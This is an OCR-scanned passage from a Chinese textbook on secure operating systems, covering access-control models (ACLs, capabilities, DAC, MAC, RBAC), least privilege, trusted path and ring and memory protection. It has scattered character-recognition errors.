交互 。 访 问 控 制 模型 除了 提供 机 密 性 和 完整 性 外 ， 还 提供 记 账 性 。 记 账 性 是 通过 审计 访 
问 记 录 实 现 的 ， 访 问 记录 包括 主体 访问 了 什么 客体 和 进行 了 什么 操作 。 访 问 控制 一 般 包 
括 三 种 类 型 ， 自主 访问 控制 、 强 制 访问 控制 和 基于 角色 的 访问 控制 。 

各 种 访问 控制 策略 之 间 并 不 相互 排斥 ， 现 存 计算 机 系统 中 通常 都 是 多 种 访问 控制 策 
略 并 存 ， 系 统管 理 员 能 够 对 安全 策略 进行 配置 使 其 达到 安全 政策 的 要 求 。 

访问 控制 机 制 是 为 检测 和 防止 系统 中 的 未 经 授权 访问 ， 对 资源 予以 保护 所 采取 的 软 
硬件 措施 和 一 系列 管理 措施 等 。 访 问 控制 一 般 是 在 操作 系统 的 控制 下 ， 按 照 事先 确定 的 
规则 决定 是 否 人 允许 主体 访问 客体 ， 它 贯穿 于 系统 工作 的 全 过 程 ， 是 在 文件 系统 中 广泛 应 
用 的 安全 防护 方法 。 
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访问 控制 矩阵 (Access Control Matrix) 是 最 初 实现 访问 控制 机 制 的 概念 模型 ， 它 利 
用 二 维和 矩 阵 规定 了 任意 主体 和 任意 客体 间 的 访问 权限 。 和 矩阵 中 的 行 代表 主体 的 访问 权限 
属性 ， 和 矩阵 中 的 列 代 表 客 体 的 访问 权限 属性 ， 甜 阵 中 的 每 一 格 表示 所 在 行 的 主体 对 所 在 
列 的 客体 的 访问 授权 ， 如 图 4-1 所 示 。 访 问 控制 的 任务 就 是 确保 系统 的 操作 是 按照 访问 
控制 矩阵 授权 的 访问 来 执行 的 , 它 是 通过 引用 监控 器 协调 客体 对 主体 的 每 次 访问 而 实现 ， 
这 种 方法 清晰 地 实现 认证 与 访问 控制 的 相互 分 离 。 


图 4-1 访问 控制 矩阵 


在 较 大 的 系统 中 , 访问 控制 矩阵 将 变 得 非常 巨大 , 而 且 和 矩阵 中 的 许多 格 可 能 都 为 空 ， 
造成 很 大 的 存储 空间 浪费 ， 因 此 在 实际 应 用 小 ， 访 问 控制 很 少 利用 和 矩阵 方式 实现 。 实 际 
E, 访问 矩阵 通常 是 稀疏 的 ， 可 以 按 行 或 按 列 分 解 之 。 

A) 访问 控制 表 (Access Control Lists) 。 访 问 控制 矩阵 按 列 分 解 ， 生 成 访问 控制 列 
表 ， 如 图 4-2 所 示 。 访 问 控制 表 是 以 文件 为 中 心 建立 访问 权限 表 。 表 中 登记 了 该 文件 的 
访问 用 户 名 及 访问 权 隶 属 关系 。 利 用 访问 控制 表 ， 能 够 很 容易 地 判断 出 对 于 特定 客体 的 
授权 访问 , 哪些 主体 可 以 访问 并 有 哪些 访问 权限 。 同 样 很 容易 撤消 特定 客体 的 授权 访问 ， 
只 要 把 该 客体 的 访问 控制 表 置 为 空 。 
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图 4-2 访问 控制 表 


由 于 访问 控制 表 简单 、 实 用 ， 虽 然 在 查询 特定 主体 能 够 访问 的 客体 时 ， 需 要 遍历 查 
询 所 有 客体 的 访问 控制 表 ， 它 仍然 是 一 种 成 熟 且 有 效 的 访问 控制 实现 方法 ， 许 多 通用 的 
操作 系统 使 用 访问 控制 表 来 提供 访问 控制 服务 。 例 如 Unix 和 VMS 系统 利用 访问 控制 表 
的 简略 方式 ， 允 许 以 少量 工作 组 的 形式 实现 访问 控制 表 ， 而 不 允许 单个 的 个 体 出 现 ， 这 
样 访问 控制 表 很 小 ， 能 够 用 几 位 就 可 以 和 文件 存储 在 一 起 。 另 一 种 复杂 的 访问 控制 表 应 
用 是 利用 一 些 访问 控制 包 ， 通 过 它 制定 复杂 的 访问 规则 限制 何 时 和 如 何 进行 访问 ， 而 且 
这 些 规则 根据 用 户 名 和 其 他 用 户 属性 的 定义 进行 单个 用 户 的 匹配 应 用 。 

(2) 权能 表 (Capabilities Lists) 。 权 能 表 与 访问 控制 表 相 反 ， 是 访问 控制 矩阵 按 行 
分 解 ， 以 用 户 为 中 心 建立 权能 表 ， 如 图 4-3 所 示 ， 表 中 规定 了 该 用 户 可 访问 的 文件 名 及 
访问 能 力 。 利 用 权能 表 可 以 很 方便 查询 一 个 主体 的 所 有 授权 访问 。 相 反 ， 检 索 具 有 授权 
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访问 特定 客体 的 所 有 主体 ， 则 需要 遍历 所 有 主体 的 权能 表 。 权 能 表 有 时 又 被 称 为 访问 能 
力 表 ， 或 用 户 权限 表 。 


图 4-3 访问 能 力 表 


由 于 受 限于 计算 机 体系 结构 ， 早 期 的 操作 系统 性 能 偏 低 ， 基 于 访问 能 力 的 操作 系统 
受到 冷落 。 而 且 当 时 计算 机 网 络 尚 未 大 规模 应 用 ， 安 全 问题 显得 不 是 非常 突出 ， 因 此 基 
于 访问 控制 表 的 操作 系统 首先 得 到 发 展 。 随 着 计算 机 软 硬 件 技术 的 发 展 以 及 对 操作 系统 
安全 性 需求 的 提高 ， 基 于 访问 能 力 的 操作 系统 日 益 受到 重视 。 这 是 因为 基于 访问 能 力 的 
系统 具有 基于 访问 控制 表 的 系统 所 不 具有 的 如 下 安全 特性 : 

最 小 特权 。 在 访问 控制 表 系 统 中 ， 进 程 根据 用 户 身份 获得 权限 ， 同 一 用 户 发 起 的 所 
有 进程 都 有 相同 的 权限 ， 因 此 最 小 特权 无 法 在 访问 控制 表 系统 上 真正 实现 。 

选择 性 授权 访问 。 访 问 控制 表 系 统 中 ， 父 进程 创建 子 进 程 后 ， 不 能 有 选择 的 指定 子 
进程 拥有 哪些 权限 。 

责任 分 离 。 访 问 控制 表 不 能 解决 责任 分 离 问题 ， 会 导致 责任 混淆 。 

自 验 证 性 。 访 问 控制 表 系 统 无 法 控制 权限 和 信息 的 流动 ， 因 而 其 自身 无 法 验证 所 有 
的 安全 策略 是 否 得 到 了 遵守 和 执行 。 

有 利于 分 布 式 环境 。 由 于 分 布 式 系统 中 很 难 确定 特定 客体 的 潜在 主体 集 ， 因 此 访问 
控制 表 一 般 用 于 集中 式 系统 ， 而 分 布 式 系统 采用 访问 能 力 表 。 

(3) WAL (Profiles) 。 对 每 个 主体 赋予 的 前 绥 表 ， 包 括 受 保护 客体 名 和 主体 对 它 
的 访问 权限 。 当 主体 要 访问 某 客体 时 ， 自 主 存 取 控制 机 制 将 检查 主体 的 前 级 是 否 具 有 它 
所 请 求 的 访问 权 。 

(4) 保护 位 (Protection Bits) 这 种 方法 对 所 有 主体 、 主 体 组 以 及 客体 的 拥有 者 指明 
一 个 访问 模式 集合 。 保 护 位 机 制 不 能 完备 地 表达 访问 控制 矩阵 ， 一 般 很 少 使 用 。 

2. 自主 访问 控制 

自主 访问 控制 (Discretionary Access Control, DAC) 是 最 常用 的 一 类 访问 控制 机 制 ， 
是 用 来 决定 一 个 用 户 是 否 有 权 访问 一 些 特定 客体 的 一 种 访问 约束 机 制 。 在 很 多 机 构 中 ， 
用 户 在 没有 系统 管理 员 介 入 的 情况 下 , 需要 具有 设 定 其 他 用 户 访问 其 所 控制 资源 的 能 力 。 
这 使 得 控制 具有 任意 性 。 在 这 种 环境 下 ， 用 户 对 信息 的 访问 能 力 是 动态 的 ， 在 短期 内 会 
有 快速 的 变化 。 自 主 访问 控制 经 常 通过 访问 控制 列表 实现 ， 访 问 控制 列表 难于 集中 进行 
访问 控制 和 访问 权利 的 管理 。 自 主 访问 控制 包括 身份 型 (Identity-Based) 访问 控制 和 用 
户 指定 型 (User-Directed) 访问 控制 。 

自主 访问 控制 ， 又 称 为 任意 访问 控制 ， 根 据 用 户 的 身份 及 允许 访问 权限 决定 其 访问 
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操作 ， 只 要 用 户 身份 被 确认 后 ， 即 可 根据 访问 控制 表 上 赋予 该 用 户 的 权限 进行 限制 性 用 
户 访问 。 使 用 这 种 控制 方法 ， 用 户 或 应 用 可 任意 在 系统 中 规定 谁 可 以 访问 他 们 的 资源 ， 
这 样 ， 用 户 或 用 户 进程 就 可 有 选择 地 与 其 他 用 户 共享 资源 。 自 主 访问 控制 是 一 种 对 单独 
用 户 执行 访问 控制 的 过 程 和 措施 。 

需要 自主 访问 控制 保护 的 客体 的 数量 取决 于 系统 环境 ， 几 乎 所 有 的 系统 在 自主 访问 
控制 机 制 中 都 包括 对 文件 、 目 录 、IPC 以 及 设备 的 访问 控制 。 

为 了 实现 完备 的 自主 访问 控制 机 制 ， 系 统 要 将 访问 控制 矩阵 相应 的 信息 以 某 种 形式 
保存 在 系统 中 。 目 前 在 操作 系统 中 实现 的 自主 访问 控制 机 制 是 基于 矩阵 的 行 或 列表 达 访 
问 控制 信息 。 

基于 行 的 自主 访问 控制 机 制 在 每 个 主体 上 都 附加 一 个 该 主体 可 访问 的 客体 的 明细 
表 ， 根 据 表 中 信息 的 不 同 又 可 分 成 以 下 三 种 形式 : 访问 能 力 表 、 前 级 表 、 口 令 。 在 基于 
口令 机 制 的 自主 存 取 控制 机 制 中 ， 每 个 客体 都 相应 地 有 一 个 口令 。 主 体 在 对 客体 进行 访 
问 前 ， 必 须 向 操作 系统 提供 该 客体 的 口令 。 如 果 正 确 ， 它 就 可 以 访问 该 客体 。 

基于 列 的 自主 访问 控制 机 制 ， 在 每 个 客体 都 附加 一 个 可 访问 它 的 主体 的 明细 表 ， 它 
有 两 种 形式 ， 即 保护 位 和 访问 控制 表 。 

由 于 DAC 对 用 户 提供 灵活 和 易 行 的 数据 访问 方式 ， 能 够 适用 于 许多 的 系统 环境 ， 
所 以 DAC 被 大 量 采用 ， 尤 其 在 商业 和 工业 环境 的 应 用 上 。 人 然而 ，DAC 提供 的 安全 保护 
容易 被 非法 用 户 绕 过 而 获得 访问 。 例如， 车 某 用 户 A 有 权 访 问 文件 FE， 而 用 户 B 无 权 访 
问 F， 则 一 旦 A 获取 下 后 再 传送 给 B， 则 B 也 可 访问 F， 其 原因 是 在 自主 访问 控制 策略 
中 ， 用 户 在 获得 文件 的 访问 权 后 ， 并 没有 限制 对 该 文件 信息 的 操作 ， 即 并 没有 控制 数据 
信息 的 分 发 。 所 以 DAC 提供 的 安全 性 还 相对 较 低 ， 不 能 够 对 系统 资源 提供 充分 的 保护 
不 能 抵御 特洛伊 木马 的 攻击 。 

3. 强制 访问 控制 

强制 访问 控制 (Mandatory Access Control) 是 一 种 不 允许 主体 干涉 的 访问 控制 类 型 。 
它 是 基于 安全 标识 和 信息 分 级 等 信息 敏感 性 的 访问 控制 。 强 制 访问 控制 包括 基于 规则 
(Rule-Based) 访问 控制 和 管理 指定 型 (Administratively-Based) 访问 控制 。 

与 DAC 相 比 ， 强 制 访问 控制 提供 的 访问 控制 机 制 无 法 绕 过 。 在 强制 访问 控制 机 制 
下 ， 系 统 中 的 每 个 进程 、 每 个 文件 、 每 个 IPC 客体 都 被 赋予 了 相应 的 安全 级 别 ， 这 些 安 
全 级 别 是 不 能 改变 的 ， 它 由 管理 部 门 或 由 操作 系统 自动 地 按照 严格 的 规则 来 设置 ， 不 像 
存 取 控制 表 那 样 由 用 户 或 他 们 的 程序 直接 或 间接 地 修改 。 系 统 通过 比较 用 户 和 访问 的 文 
件 的 安全 级 别 来 决定 用 户 是 否 可 以 访问 该 文件 。 此 外 ， 强 制 访问 控制 不 允许 一 个 进程 生 
成 共享 文件 ， 从 而 防止 进程 通过 共享 文件 将 信息 从 一 个 进程 传 到 另 一 进程 。 

强制 存 取 控制 和 自主 存 取 控 制 是 两 种 不 同类 型 的 存 取 控制 机 制 ， 自 主 访问 控制 较 
弱 ， 而 强制 访问 控制 又 太 强 ， 会 给 用 户 带 来 许多 不 便 。 因 此 ， 实 际 应 用 中 ， 往 往 将 自主 
访问 控制 和 强制 访问 控制 结合 在 一 起 使 用 。 自 主 访问 控制 作为 基础 的 、 常用 的 控制 手段 ; 
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强制 访问 控制 作为 增强 的 、 更 加 严格 的 控制 手段 。 强 制 存 取 控制 常用 于 将 系统 中 的 信息 
分 密级 和 类 进行 管理 ， 适 用 于 政府 部 门 、 军 事 和 金融 等 领域 。 

通常 强制 访问 控制 可 以 有 许多 不 同 的 定义 ， 但 它们 都 同 美国 国防 部 定义 的 多 级 安全 
策略 相 接 近 ， 所 以 人 们 一 般 都 将 强制 访问 控制 和 多 级 安全 体系 相提并论 。 

多 级 安全 (又 称 MLS) 是 军事 安全 策略 的 数学 描述 ， 是 计算 机 能 实现 的 形式 定义 。 

计算 机 内 的 所 有 信息 (如 文件 ) 都 具有 相应 的 密级 ， 每 个 人 都 拥有 一 个 许可 证 。 军 
事 安全 策略 的 目的 是 防止 用 户 取得 自己 不 应 得 到 的 密级 较 高 的 信息 。 密 级 、 安 全 属性 、 
许可 证 、 访 问 类 等 含义 是 一 样 的， 分 别 对 应 于 主体 或 客体 ， 一 般 都 统称 安全 级 。 安 全 级 
由 两 方面 的 内 容 构成 : 保密 级 别 〈 或 叫做 敏感 级 别 或 级 别 ) 和 范畴 集 。 

安全 级 包括 一 个 保密 级 别 ， 范 畴 集 包 含 任意 多 个 范畴 。 安 全 级 通常 写作 保密 级 别 后 
随 一 范畴 集 的 形式 。 实 际 上 范畴 集 常 常 是 空 的 ， 而 且 很 少 有 几 个 范畴 名 。 

在 安全 级 中 保密 级 别 是 线性 排列 的 。 两 个 安全 级 之 问 的 关系 有 以 下 几 种: 第 一 安全 
级 支配 第 二 安全 级 ; 第 二 安全 级 支配 第 一 安全 级 ; 第 一 安全 级 等 于 第 二 安全 级 ; 两 个 安 
全 级 无 关 。 

MAC 可 通过 使 用 敏感 标签 对 所 有 用 户 和 资源 强制 执行 安全 策略 ， 即 实行 强制 访问 
控制 。 安 全 级 别 一 般 有 四 级 : 绝密 级 (Top Secret) , 秘密 级 (Secret), 机 密级 (Confidential) 
MABINZ (Unclassified) ， 其 中 T>S>C>U。 

则 用 户 与 访问 的 信息 的 读 写 关系 将 有 4 种 ， 即 : 

Fist (read down) : 用 户 级 别 高 于 文件 级 别 的 读 操作 。 

上 写 (write up) : 用 户 级 别 低 于 文件 级 别 的 写 操作 。 

下 写 (write down) : 用 户 级 别 高 于 文件 级 别 的 写 操作 。 

上 读 (readup) : 用 户 级 别 低 于 文件 级 别 的 读 操作 。 

上 述 读 写 方式 都 保证 了 信息 流 的 单 向 性 ， 显 然 上 读 一 下 写 方式 保证 了 数据 的 完整 性 
(Integrity) ， 上 写 一 下 读 方 式 则 保证 了 信息 的 秘密 性 。 

4. 基于 角色 访问 控制 

基于 角色 的 访问 控制 (Role-Based Access Control) 是 目前 国际 上 流行 的 先进 的 安全 
访问 控制 方法 。 它 通过 分 配 和 取消 角色 来 完成 用 户 权 限 的 授予 和 取消 ， 并 且 提 供 角色 分 
配 规则 。 安 全 管理 人 员 根 据 需要 定义 各 种 角色 ， 并 设置 合适 的 访问 权限 ， 而 用 户 根据 其 
责任 和 资历 再 被 指派 为 不 同 的 角色 。 这 样 ， 整 个 访问 控制 过 程 就 分 成 两 个 部 分 ， 即 访问 
权限 与 角色 相关 联 ， 角 色 再 与 用 户 关联 ， 从 而 实现 了 用 户 与 访问 权限 的 逻辑 分 离 。 由 于 
实现 了 用 户 与 访问 权限 的 逻辑 分 离 ， 基 于 角色 的 策略 极 大 地 方便 了 权限 管理 。 例 如 ， 如 
果 一 个 用 户 的 职位 发 生变 化 ， 只 要 将 用 户 当前 的 角色 去 掉 ， 加 入 代表 新 职务 或 新 任务 的 
角色 即 可 。 研 究 表 明 ， 和 角色/ 权限 之 间 的 变化 比 角色 /用 户 关 系 之 间 的 变化 相对 要 慢 得 多 ， 
并 且 给 用 户 分 配角 色 不 需要 很 多 技术 ， 可 以 由 行政 管理 人 员 来 执行 ， 而 给 角色 配置 权限 
的 工作 比较 复杂 ， 需 要 一 定 的 技术 ， 可 以 由 专门 的 技术 人 员 来 承担 ， 但 是 不 给 他 们 给 用 
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户 分 配角 色 的 权限 ， 这 与 现实 中 的 情况 正好 一 致 。 

基于 角色 访问 控制 可 以 很 好 地 描述 角色 层次 关系 ， 实 现 最 小 特权 原则 和 职责 分 离 
原则 。 

在 基于 角色 的 访问 控制 模式 中 ， 用 户 不 是 自始至终 以 同样 的 注册 身份 和 权限 访问 系 
统 ， 而 是 以 一 定 的 角色 访问 ， 不 同 的 角色 被 赋予 不 同 的 访问 权限 ， 系 统 的 访问 控制 机 制 
只 看 到 角色 ， 而 看 不 到 用 户 。 用 户 在 访问 系统 前 ， 经 过 角色 鉴别 而 充当 相应 的 角色 。 用 
户 获 得 特定 角色 后 ， 系 统 依然 可 以 按照 自主 访问 控制 或 强制 访问 控制 机 制 控制 角色 的 访 
问 能 力 。 

在 基于 角色 的 访问 控制 系统 中 ， 由 系统 管理 员 负 责 管理 系统 的 角色 集合 和 存 取 权限 
人 合 ， 并 将 这 些 权限 〈 不 同类 别 和 级 别 ) 通过 相应 的 角色 分 别 赋予 承担 不 同 工 作 职责 的 
终端 用 户 ， 而 且 还 可 以 随时 根据 业务 的 要 求 或 变化 对 角色 的 存 取 权限 集 和 用 户 所 拥有 的 
角色 集 进行 调整 ， 这 里 也 包括 对 可 传递 性 的 限制 。 

fA Role) 定义 为 与 一 个 特定 活动 相关 联 的 一 组 动作 和 责任 。 系 统 中 的 主体 担任 
角色 ， 完 成 角色 规定 的 责任 ， 具 有 和 角色 拥有 的 权限 。 一 个 主体 可 以 同时 担任 多 个 角色 ， 
它 的 权限 就 是 多 个 角色 权限 的 总 和 。 

基于 角色 的 访问 控制 就 是 通过 定义 角色 的 权限 ， 为 系统 中 的 主体 分 配角 色 来 实现 访 
问 控制 的 。 通 过 各 种 角色 的 不 同 搭配 授权 来 尽 可 能 实现 主体 的 最 小 权限 ; 通过 不 同 的 角 
色 来 明确 区 分 权限 (Authority) 和 职责 (Responsibility) 。 

用 户 先 经 鉴别 后 获得 一 定 角色 ， 该 角色 被 分 派 了 一 定 的 权限 ， 用 户 以 特定 角色 访问 
系统 资源 ， 访 问 控制 机 制 检查 角色 的 权限 ， 并 决定 是 否 允许 访问 。 

角色 访问 策略 是 根据 用 户 在 系统 里 表现 的 活动 性 质 而 定 的 ， 活 动 性 质 表 明 用 户 充 当 
一 定 的 角色 ， 用 户 访问 系统 时 ， 系 统 必须 先 检查 用 户 的 角色 。 一 个 用 户 可 以 充当 多 个 角 
色 ， 一 个 角色 也 可 以 由 多 个 用 户 担 任 。 角 色 访 问 策略 具有 以 下 优点 : 

便于 授权 管理 ， 如 系统 管理 员 需 要 修改 系统 设置 等 内 容 时 ， 必 须 有 几 个 不 同 角 色 的 
用 户 到 场 方 能 操作 ， 从 而 保证 了 安全 性 ; 

便于 根据 工作 需要 分 级 ， 如 企业 财务 部 门 与 非 财力 部 门 的 员工 对 企业 财务 的 访问 权 
就 可 由 财务 人 员 这 个 角色 来 区 分 ; 

便于 赋予 最 小 特权 ， 如 即使 用 户 被 赋予 高 级 身份 时 也 未 必 一 定 要 使 用 ， 以 便 减 少 损 
失 。 只 有 必要 时 方 能 拥有 特权 ; 

便于 任务 分 担 ， 不 同 的 角色 完成 不 同 的 任务 ; 

便于 文件 分 级 管理 ， 文 件 本 身 也 可 分 为 不 同 的 角色 ， 如 信件 、 账 单 等 ， 由 不 同 角色 
的 用 户 拥有 。 

角色 访问 策略 是 一 种 有 效 而 灵活 的 安全 措施 。 通 过 定义 模型 各 个 部 分 ， 可 以 实现 
DAC 和 MAC 所 要 求 的 控制 策略 。 

基于 角色 的 访问 控制 的 功能 相当 强大 ， 适 用 于 许多 类 型 〈 从 政府 机 构 到 商业 应 用 ) 
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的 用 户 需求 。Netware、Windows NT, Solaris 和 SELinux 等 操作 系统 中 都 采用 了 类 似 的 
RBAC 技术 作为 存 取 控 制 手段 。 
4.2.4.3 ”最 小 特权 管理 

最 小 特权 原则 是 系统 安全 中 最 基本 的 原则 之 一 。 最 小 特权 (Least Privilege) ， 指 的 
是 “在 完成 某 种 操作 时 所 赋予 系统 中 每 个 主体 (用 户 或 进程 ) 必 不 可 少 的 特权 ”。 最 小 
特权 原则 应 限定 系统 中 每 个 主体 所 必需 的 最 小 特权 ， 确 保 可 能 的 事故 、 错 误 、 网 络 部 件 
的 自 改 等 原因 造成 的 损失 最 小 。 

最 小 特权 原则 一 方面 给 予 主体 “ 必 不 可 少 ” 的 特权 ， 这 就 保证 了 所 有 的 主体 都 能 在 
所 赋予 的 特权 之 下 完成 所 需要 完成 的 任务 或 操作 ; 另 一 方面 ， 它 只 给 予 主体 “ 必 不 可 少 ” 
的 特权 ， 这 就 限制 了 每 个 主体 所 能 进行 的 操作 。 

最 小 特权 原则 要 求 每 个 主体 在 操作 时 应 当 使 用 尽 可 能 少 的 特权 ， 而 角色 允许 主体 以 
参与 某 特定 工作 所 需要 的 最 小 特权 去 签 入 (Sign) 系统 。 被 授权 拥有 强力 角色 (Powerful 
Roles) 的 主体 ， 不 需要 动 辑 运用 到 其 所 有 的 特权 ， 只 有 在 那些 特权 有 实际 需求 时 ， 主 体 
才 去 运用 它们 。 如 此 一 来 ， 将 可 减少 由 于 不 注意 的 错误 或 是 侵入 者 假装 合法 主体 所 造成 
的 损坏 发 生 ， 限 制 了 事故 、 错 误 或 攻击 带 来 的 危害 。 它 还 减少 了 特权 程序 之 间 洪 在 的 相 
互 作用 ， 从 而 使 对 特权 无 意 的 、 没 必要 的 或 不 适当 的 使 用 不 太 可 能 发 生 。 这 种 想法 还 可 
以 引申 到 进程 内 部 : 只 有 进程 中 需要 那些 特权 的 最 小 部 分 才 拥 有 特权 。 

最 小 特权 在 安全 操作 系统 中 占据 了 非常 重要 的 地 位 。 主 流 多 用 户 操作 系统 中 ， 超 级 
用 户 一 般 具 有 所 有 特权 ， 而 普通 用 户 不 具有 任何 特权 。 

角色 管理 机 制 依据 “最 小 特权 ”原则 ， 将 特权 用 户 的 特权 加 以 划分 ， 如 系统 安全 管 
FER (SSO) ， 负 责 对 系统 资源 和 应 用 定义 安全 级 ， 定 义 用 户 组 ， 为 所 有 用 户 赋予 安全 
级 ， 限 制 隐蔽 通道 活动 的 机 制 ， 审计 员 (AUD) ， 负 责 设 置 审计 参数 ， 修 改 和 删除 审计 
信息 ; 操作 员 (OP) ， 负 责 启 动 或 停 目 系统， 设置 终端 参数 ， 允 许 或 不 允许 登录 ; 安全 
管理 员 CNET) ， 负 责 管理 网 络 软件 ， 配 置 网 络 协议 。 从 而 形成 一 组 细 粒 度 的 特权 ， 每 
个 特权 用 户 只 能 拥有 刚 够 完成 工作 的 最 小 权限 。 然 后 根据 系统 管理 任务 设立 角色 ， 依 据 
角色 划分 权限 ， 每 个 角色 各 负 其 责 ， 权 限 各 自分 立 ， 一 个 管理 角色 不 拥有 另 一 个 管理 角 
色 的 特权 。 为 了 保证 系统 的 安全 性 ， 不 应 赋予 某 人 一 个 以 上 的 职责 。 

常见 的 最 小 特权 管理 机 制 可 分 为 基于 文件 的 特权 机 制 和 基于 进程 的 特权 机 制 。 

例如 ， 在 惠普 的 Presidum/Virtual Vault 中 ， 通 过 以 最 小 特权 机 制 将 超级 用 户 的 功能 
分 成 42 种 独立 的 特权 ， 仅 赋予 每 一 进程 正常 运行 所 需 的 最 小 特权 。 因 而 ， 即 便 一 名 黑客 
将 特洛伊 木马 程序 安装 在 金融 机 构 的 Web 服务 器 上 , 入 侵 者 也 无 法 改变 网 络 配置 或 安装 
文件 系统 。 最 小 特权 是 在 惠普 可 信赖 操作 系统 Virtual Vault 的 基本 特性 。 

在 红旗 安全 操作 系统 RFSOS 中 ， 一 个 管理 角色 不 拥有 另 一 个 管理 角色 的 特权 ， 攻 
击 者 破获 某 个 管理 角色 口令 时 ， 不 会 得 到 对 系统 的 完全 控制 。 

在 SELinux 系统 中 不 再 有 超级 用 户 ， 而 被 分 解 ， 避 免 了 超级 用 户 的 误 操 作 或 其 身份 
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被 假冒 而 带 来 的 安全 隐患 。 

最 小 特权 原则 有 效 地 限制 、 分 割 了 用 户 对 数据 资料 进行 访问 时 的 权限 ， 降 低 了 非法 
用 户 或 非法 操作 可 能 给 系统 及 数据 带 来 的 损失 ， 对 于 系统 安全 具有 至 关 重 要 的 作用 。 但 
目前 大 多 数 系统 的 管理 员 对 于 最 小 特权 原则 的 认识 还 不 够 深入 。 尤 其 是 对 于 UNIX, 
Windows 系列 操作 系统 下 ， 因 为 系统 所 赋予 用 户 的 默认 权限 是 最 高 的 权限 ， 如 果 系 统 的 
管理 员 不 对 此 进行 修改 ， 则 系统 的 安全 性 将 非常 薄弱 。 

当然 ， 最 小 特权 原则 只 是 系统 安全 的 原则 之 一 ， 如 果 要 使 系统 的 达到 相当 高 的 安全 
性 ， 还 需要 其 他 原则 的 配合 使 用 。 
4.2.4.4 可 信 通 路 机 制 

可 信 通 路 (Trusted Path, TP) ， 也 称 为 可 信 路 径 ， 是 指 用 户 能 跳 过 应 用 层 而 直接 同 
可 信 计 算 基 之 间 通 信 的 一 种 机 制 。 

一 般 来 说 ， 用 户 是 通过 应 用 程序 及 操作 系统 接口 来 与 安全 内 核 相互 作用 的 。 因 此 ， 
当 用 户 在 执行 系统 登录 或 注册 、 安 全 属性 定义 、 文 件 安全 级 别 改变 等 安全 敏感 操作 时 ， 
应 保证 用 户 确 确实 实 是 在 与 安全 内 核 而 非特 洛 伊 木 马 程序 打交道 。 换 名 话说， 系统 必须 
通过 提供 可 信 通 路 的 安全 机 制 来 防止 特洛伊 木马 程序 模仿 登录 过 程 以 窃取 用 户口 令 ， 并 
保证 特权 用 户 执行 特权 操作 时 终端 输入 信息 的 非 泄 密 性 和 输出 信息 的 正确 性 。 

构建 可 信 通 路 的 简单 方法 是 为 每 个 用 户 提供 两 台 终 端 ， 一 台 用 于 完成 日 常 的 普通 工 
作 ， 另 一 台 用 于 实现 与 安全 内 核 的 硬 连接 及 专职 执行 安全 敏感 操作 。 显 然 ， 此 法 具有 代 
价 昂贵 的 致命 缺陷 , 同时 还 会 引入 诸如 如 何 确保 “安全 终端 ”的 安全 可 靠 及 如 何 实现 “ 安 
全 终端 ”和 “普通 终端 ”的 协调 工作 等 新 问题 。 

更 为 现实 的 方法 是 要 求 用 户 在 执行 敏感 操作 前 ， 使 用 一 般 的 通用 终端 和 向 安全 内 核 
发 送 所 谓 的 “安全 注意 符 ”《〈 即 不 可 信 软 件 无 法 拦截 、 履 盖 或 伪造 的 特定 信号 ) 来 触发 
和 构建 用 户 与 安全 内 核 间 的 可 信 通 路 。 


系统 指定 的 一 个 或 一 组 按键 来 激活 。 例 如 ,X86 平台 的 Linux 环境 中 ,规定 “AlttSysRqt+K” 
为 安全 注意 键 。 缺 省 情况 下 ， 安 全 注意 键 处 于 关闭 状态 ， 需 要 用 命令 echo "1" > 
/proc/sys/kemel/sysrq 来 打开 (即将 CONFIG_MAGIC_SYSRQ 设置 为 真 值 ) 。 当 然 ， 也 
可 将 该 命令 写 入 登录 脚本 中 ， 以 减少 不 必要 的 有 麻烦。 其实， 在 WINNT/2000/XP 系列 操 
作 系 统 中 , 也 规定 了 具有 类 似 作用 的 安全 注意 键 (不 过 , 微软 公司 称 其 为 Secure Attention 
Sequence, SAS) ， 即 “Ctrl + Alt + Del” 按 键 组 合 ， 它 们 曾 在 DOS 系统 中 充当 热 启 动 
命令 。 
4.2.4.5 ”运行 保护 机 制 

操作 系统 为 保护 自身 运行 的 安全 ， 通 常 采 用 了 保护 环 机 制 。 安 全 操作 系统 很 重要 的 
一 点 是 进行 分 层 设 计 ， 而 运行 域 正 是 一 种 基于 保护 环 的 层次 等 级 式 结构 。 运 行 域 是 进程 
运行 的 区 域 ， 最 内 层 具有 最 小 环 号 的 环 拥有 最 高 特权 ， 最 外 层 具有 最 大 环 号 的 环 拥有 最 
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小 特权 ， 一 般 的 系统 不 少 于 3 至 4 个 环 。 应 该 保护 某 一 环 不 被 其 外 层 环 侵入 ， 人 允许 在 某 
环 内 的 进程 能 够 有 效 地 控制 和 利用 该 环 以 及 该 环 以 外 的 环 。 

处 理 器 的 访问 模式 决定 了 指令 执行 特权 、 即 处 理 器 当前 可 执行 的 指令 系统 子 集 ， 随 
当前 模式 而 增 减 的 存储 访问 特权 、 即 当前 指令 可 以 存 取 的 虚拟 内 存 的 位 置 。 

VAX/VMS 操作 系统 的 四 种 模式 构成 保护 环 : 内 核 Cemel) 模式 ， 执 行 VMS 操作 
系统 的 内 核 ， 包 括 内 存 管理 、 中 断 处 理 、IO 操作 等 ; PUT (executive) 模式 ， 执 行 操作 
系统 的 各 种 系统 调用 ， 如 文件 操作 等 ;监管 〈supervisor) 模式 ， 执 行 操作 系统 其 余 系 统 
调用 ， 如 应 答 用 户 请 求 ， 用 户 (user) 模式 ， 执 行 用 户 进程 ， 如 编译 、 编 辑 、 链 接 、 排 
错 等 应 用 。 

当前 的 操作 系统 绝 大 多 数 都 是 多 任务 并 发 操作 系统 ， 允 许 用 户 在 自己 的 权限 内 同时 
创建 多 个 并 发 进程 。 这 样 一 来 ， 进 程 转换 的 安全 问题 就 成 为 了 操作 系统 设计 者 首先 要 考 
虑 的 问题 之 一 。 

为 了 实现 并 发 进程 的 安全 ， 通 常 操作 系统 的 设计 者 在 进程 的 唯一 标识 一 一 进程 控制 
块 中 进行 相应 的 设置 ， 用 它 来 控制 和 管理 进程 ， 实 现 并 发 进程 的 安全 。 其 中 进程 的 隔离 
是 最 基本 的 运行 保护 机 制 。 
4.2.4.6 ”存储 保护 机 制 

存储 器 是 操作 系统 管理 的 重要 资源 之 一 ， 也 是 被 攻击 的 主要 目标 。 存 储 器 保护 是 操 
作 系统 得 以 正常 运行 的 基础 ， 是 安全 操作 系统 提供 的 最 基本 的 安全 服务 之 一 。 存 储 器 保 
护 主要 是 指 保护 用 户 在 存储 器 中 的 数据 ， 防 止 存储 器 中 的 数据 泄漏 或 被 算 改 。 对 于 一 个 
多 任务 系统 来 说 ， 如 果 没 有 存储 器 保护 机 制 ， 系 统 也 就 没有 任何 安全 性 可 言 。 

